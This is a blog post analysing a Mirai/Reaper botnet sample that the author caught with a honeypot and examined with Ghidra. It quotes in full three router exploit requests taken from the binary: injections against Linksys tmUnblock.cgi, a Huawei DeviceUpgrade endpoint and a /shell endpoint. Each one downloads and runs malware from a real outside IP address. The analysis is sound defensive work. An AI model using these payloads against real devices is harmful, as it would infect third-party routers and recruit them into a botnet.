In my previous post, I showed how I set up a honey pot to capture HTTP requests coming to my IP address. Some of the requests where bots attempting to exploit vulnerabilities in order to gain access to devices and services, one of these requests attempted to inject shell commands to download and run a malware.

I download reap.mpsl using curl so we can have a close look at what the attackers are trying to infect the honey pot with.

Uploading reap.mpsl to virustotal we can see that it has been registered as a Mirai/Reaper Malware by several antivirus application, first submitted to virustotal on 2022-06-28

Analysing with Ghidra

By using Ghidra we can disassemble and analyse the malware executable and see if it will reveal any secrets. Looking at Ghidras initial analysis we can see it is a 32bit MIPS executable

About Reaper

Strings

The first thing we are going to look at are the text strings that are compiled into the executable, plain text strings give us a easy look into what the exe is doing and what resources it may attempt to use.
To do this in click Search -> For Strings... in the top menu bar, Ghidra will then search the exe for strings and dispaly them.\

Reaper Strings\

Straight away we can see a string that was probably used to attack our honey pot, the highlighted string in the list starts with POST /tmUnblock.cgi looking at the my previous post we can see that /tmUnblock.cgi was the endpoint the malware was attempt to exploit. Directly below this string we can see what looks like another POST request, this time to /ctrlt/DeviceUpgrade_1 and further down there is a third that looks like a GET request to /shell with shell commands.
Next I will extract the strings that look like HTTP attacks so we can have a closer look at what they are trying to do.

Attack 1 (hit our honey pot)

Extracting the first suspicious string from Ghidra we can see it contains the following:\

“POST /tmUnblock.cgi HTTP/1.1\r\nHost: 91.218.67.131:80\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: /\r\nUser-Agent: python-requests/2.20.0\r\nContent-Length: 227\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+mpsl%3B+wget+http%3A%2F%2F91.218.67.131%2Freaper%2Freap.mpsl%3B+chmod+777+reap.mpsl%3B+.%2Freap.mpsl+Reaper.linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1”

Tiding it up to make it easier to read:

“POST /tmUnblock.cgi HTTP/1.1 Host: 91.218.67.131:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded ttcp_ip=-h+cd+/tmp;+rm+-rf+mpsl;+wget+http://91.218.67.131/reaper/reap.mpsl;+chmod+777+reap.mpsl;+./reap.mpsl+Reaper.linksys&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1”

We can see that this string contains exactly what was picked up with the honey pot from one of the suspicious request, this is a good indication that it was this Malware exe that made the request. (possibly running on someones infected device)

Attack 2 (POST to /ctrlt/DeviceUpgrade_1)

Extracting the second suspicious string we see it contains the following:

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: / Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669" <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">$(busybox wget -g 91.218.67.131 -l /tmp/bigH -r /reaper/reap.mips;chmod 777 /tmp/bigH;/tmp/bigH huawei.rep.mips;rm -rf /tmp/bigH)$(echo HUAWEIUPNP)</u:Upgrade></s:Envelope>

This attack appears to contain a Digest access authentication header using the username “dslf-config” this suggests that the Malware is attempting to exploit default username/password that could be on the device.

The body of this attack contains the following XML payload:

<?xml version=\"1.0\" ?>
<s:Envelope
  xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">
  <s:Body>
    <u:Upgrade
      xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">
      <NewStatusURL>$(busybox wget -g 91.218.67.131 -l /tmp/bigH -r /reaper/reap.mips;chmod 777 /tmp/bigH;/tmp/bigH huawei.rep.mips;rm -rf /tmp/bigH)</NewStatusURL>
      <NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>
    </u:Upgrade>
  </s:Body>
</s:Envelope>

The XML data is likely used in a upgrade process which will cause the device to download and run reap.mips

Attack 3 (GET to /shell)

Extracting the third suspicious string we see it contains the following:

GET /shell?cd+/tmp;rm+-rf+;wget+ 91.218.67.131/reaper/reap.arm4;chmod+777+/tmp/reap.arm4;sh+/tmp/reap.arm4 HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive

This attack is performing a HTTP GET command to /shell with the following parameter cd+/tmp;rm+-rf+*;wget+ 91.218.67.131/reaper/reap.arm4;chmod+777+/tmp/reap.arm4;sh+/tmp/reap.arm4 Again, this command will download and run reap.arm4, which is the same malware as seen before but complied to run on arm4 processors.